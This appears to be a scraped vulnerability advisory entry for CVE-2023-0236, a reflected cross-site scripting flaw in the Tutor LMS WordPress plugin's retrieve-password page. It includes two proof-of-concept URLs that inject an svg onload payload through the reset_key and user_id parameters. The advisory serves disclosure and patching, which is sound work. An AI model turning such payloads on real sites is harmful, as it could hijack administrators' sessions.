Lucene search
So SakaguchiWPEX-ID:503835DB-426D-4B49-85F7-C9A20D6FF5B8HistoryJan 12, 2023 - 12:00 a.m.
Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting
2023-01-1200:00:00
So Sakaguchi
56
tutor lms
cross-site scripting
retrieve-password
vulnerability
0.001 Low
EPSS
Percentile
46.5%
The plugin does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
https://example.com/dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(/XSS/)%3E&user_id=dd
https://example.com/dashboard/retrieve-password/?reset_key=a&user_id=%22%3E%3Csvg%20onload=prompt(/XSS/)%3ERelated
cvelist
cvelist
CVE-2023-0236 Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting
2023-02-06 19:59:21
cve
cve
CVE-2023-0236
2023-02-06 20:15:14
nuclei
nuclei
WordPress Tutor LMS <2.0.10 - Cross Site Scripting
2023-03-18 22:07:09
prion
prion
Cross site scripting
2023-02-06 20:15:00
wpvulndb
wpvulndb
Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting
2023-01-12 00:00:00
nvd
nvd
CVE-2023-0236
2023-02-06 20:15:14